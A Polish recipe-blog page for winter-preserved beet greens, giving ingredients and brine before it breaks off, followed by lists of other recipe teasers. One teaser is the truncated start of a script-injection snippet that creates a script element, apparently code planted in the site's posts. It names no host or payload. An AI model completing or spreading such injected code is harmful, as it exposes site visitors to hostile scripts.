Botwina na zimę.

Botwina na zimę.Wystarczy wrzucić do bulionu i zaprawić śmietaną. Do tego jajeczko i ziemniaczki, powiew wiosny na talerzu zimową porą!Składniki:4 duże pęczki botwiny z trochę podrośniętymi buraczkami2 pęczki koperku1-2 główki czosnku Zalewa:3l wody3 łyżki cukru3 łyżki soli kamiennej (najlepiej przeznaczonej do zapraw, dostępnej w sklepach)4 łyżki octu spirytusowego7-8 litrowych słoikówSposób przygotowania: Odcinamy buraczki od liści, obieramy je ze skórki. Myjemy...
Najnowsze przepisy
Rabarbar pojawia się w sklepach i na straganach wcześnie... ⇖ 11
Ah, Thanksgiving! It’s that magical time of year when the... ⇖ 9
Uwielbiam kuchnię pełną wyrazistych smaków i aromatów,... ⇖ 10
Jesień zagościła na dobre, to i w kuchni również jest... ⇖ 11
(function(){ u938=document.createElement("script");u938.type ⇖ 10
Idealne, słodko winne polędwiczki w sosie śliwkowym,... ⇖ 21
Przepisy z bloga
Pyzy drożdżowe w Wielkopolsce zwane kluchami na łachu od... ⇖ 110
Nasz sernik jest bardzo puszysty i delikatny. Użyłyśmy... ⇖ 142
Dzisiaj pieczemy szarlotki i jabłeczniki, tymczasem nasze... ⇖ 66
Bardzo proste ciasto z owocami. Wystarczy wrzucić do miski... ⇖ 72
Lekko słodkawa, w sam raz dla dzieci, taka jaką gotowała... ⇖ 70
Tarte buraki na zimę -przepis podstawowy. Buraczki z tego... ⇖ 210
Przepisy na czasie
Murzynek to takie ciasto, które piekło się u mnie w domu... ⇖ 831
Sezon na grzyby jest w pełni, w tym roku jest istne,... ⇖ 356
Sernik bez sera to taki wypiek, który potrafi naprawdę... ⇖ 328
Przysmak Sułtana to jedno z tych ciast, które wygląda... ⇖ 323
Sernik to jedno z tych ciast, które nigdy się nie nudzą... ⇖ 266